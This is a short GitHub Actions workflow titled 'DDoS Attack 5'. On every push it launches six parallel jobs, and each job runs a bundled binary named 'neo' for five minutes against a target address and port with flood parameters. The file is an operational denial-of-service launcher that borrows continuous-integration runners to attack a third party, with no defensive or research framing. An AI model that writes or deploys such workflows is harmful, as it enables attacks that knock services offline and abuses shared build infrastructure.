name: DDoS Attack 5
on: [push, workflow_dispatch]

jobs:
    attack:
        runs-on: ubuntu-20.04
        strategy:
            matrix:
                count: [1,2,3,4,5,6]
        steps:
        - uses: actions/checkout@v3
        - run: chmod +x neo
        - run: timeout 300 ./neo 10.1.31 10382 10 999
